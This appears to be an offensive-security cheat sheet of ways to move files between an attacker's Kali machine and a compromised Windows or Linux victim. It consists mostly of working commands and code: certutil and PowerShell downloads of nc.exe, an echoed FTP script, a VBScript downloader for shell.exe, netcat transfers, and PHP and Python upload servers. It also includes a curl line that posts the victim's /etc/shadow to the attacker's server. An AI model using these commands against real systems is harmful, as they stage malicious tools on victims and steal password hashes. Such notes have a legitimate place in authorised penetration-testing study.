Transfer File
Windows
HTTP Server
# kali
python3 -m http.server 80
# windows
[cmd] certutil.exe -urlcache -f http://<ip kali>/nc.exe nc.exe
[PS] Invoke-WebRequest -Uri "http://<ip kali>/nc.exe" -OutFile "C:\Windows\Tasks\nc.exe"Impacket-smbserver
# kali linux
impacket-smbserver -smb2support -user test -password P@ssw0rd warrior `pwd`
# windows target
[cmd] net use * \\<kali ip>\warrior
[cmd] cd Z:\nc.exe
# windows target run [ctrl + r]
\\<kali ip>\warriorFTP with Python
create ftp with python
## kali (attacker)
python -m pyftpdlib -p 21
## victim (windows)
[cmd] cd wmpub
[cmd] echo open 192.168.45.207 21>>ftp.txt&echo USER anonymous>>ftp.txt&echo anonymous>>ftp.txt&echo bin>>ftp.txt&echo GET nc.exe>>ftp.txt&echo bye>>ftp.txt
[cmd] echo open 10.10.14.13 21> ftp.txt&echo USER anonymous >> ftp.txt&echo anonymous>> ftp.txt&echo bin>> ftp.txt&echo GET nc.exe >> ftp.txt&echo bye>> ftp.txt
[cmd] ftp -v -n -s:ftp.txt wget with VBScript
run wget.vbs
windows
./wget.vbs http://<attacker ip>/shell.exe shell.exe
kali
cscript wget.vbs http://<attacker ip>/shell.exe shell.exewget.vbs
strUrl = WScript.Arguments.Item(0)
StrFile = WScript.Arguments.Item(1)
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1
Const HTTPREQUEST_PROXYSETTING_PROXY = 2
Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts
Err.Clear
Set http = Nothing
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest")
If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP")
If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP")
http.Open "GET", strURL, False
http.Send
varByteArray = http.ResponseBody
Set http = Nothing
Set fs = CreateObject("Scripting.FileSystemObject")
Set ts = fs.CreateTextFile(StrFile, True)
strData = ""
strBuffer = ""
For lngCounter = 0 to UBound(varByteArray)
ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1)))
Next
ts.Close Non-Interactive command:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbsLinux
netcat
#On the receiving end running,
nc -l -p 1234 > out.file
# will begin listening on port 1234.
# On the sending end running,
nc -w 3 [destination] 1234 < out.file Upload.php
Attacker Machine:
setup the php web server
/var/www/html/upload.php
<?php
$target_path = "uploads/";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
echo "Source=" . $_FILES['uploadedfile']['name'] . "<br />";
echo "Target path=" . $target_path . "<br />";
echo "Size=" . $_FILES['uploadedfile']['size'] . "<br />";
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
echo "The file " . basename( $_FILES['uploadedfile']['name']) . " has been uploaded";
} else{
echo "There was an error uploading the file, please try again!";
}
?>Power up the apache server
systemctl start apache2Victim:
curl --form "uploadedfile=@/etc/shadow" http://<attacker ip>/upload.phpPython Simple Upload HTTP Server
run this in attacker machine, use for downloading the file and uploading the file from victim machine.
import cgi
import http.server
import socketserver
import os
from pathlib import Path
PORT = 8080
UPLOAD_DIRECTORY = "./uploaded"
class UploadHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path == '/':
self.send_response(200)
self.send_header('Content-Type', 'text/html')
self.end_headers()
file_list_html = "<ul>"
for filename in os.listdir(UPLOAD_DIRECTORY):
file_list_html += f"<li><a href='/{UPLOAD_DIRECTORY}/{filename}'>{filename}</a></li>"
file_list_html += "</ul>"
self.wfile.write(f'''<!DOCTYPE html>
<html>
<head>
<title>Files List</title>
</head>
<body>
<h1>Files:</h1>
{file_list_html}
<form action="/upload" method="post" enctype="multipart/form-data">
Select file to upload: <input type="file" name="file" id="file">
<input type="submit" value="Upload" name="submit">
</form>
</body>
</html>'''.encode())
else:
super().do_GET()
def do_POST(self):
if self.path == '/upload':
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST'}
)
file_item = form['file']
if file_item.filename:
file_path = Path(file_item.filename)
upload_path = Path(UPLOAD_DIRECTORY) / file_path.name
with open(upload_path, 'wb') as file:
file.write(file_item.file.read())
self.send_response(303) # Redirect with "See Other"
self.send_header('Location', '/') # Redirect to root directory
self.end_headers()
else:
self.send_response(400)
self.send_header('Content-Type', 'text/html')
self.end_headers()
self.wfile.write(b'<h1>No file was uploaded</h1>')
else:
super().do_POST()
if __name__ == "__main__":
if not os.path.exists(UPLOAD_DIRECTORY):
os.makedirs(UPLOAD_DIRECTORY)
with socketserver.TCPServer(("", PORT), UploadHandler) as httpd:
print(f"Serving at http://localhost:{PORT}")
httpd.serve_forever()
Last updated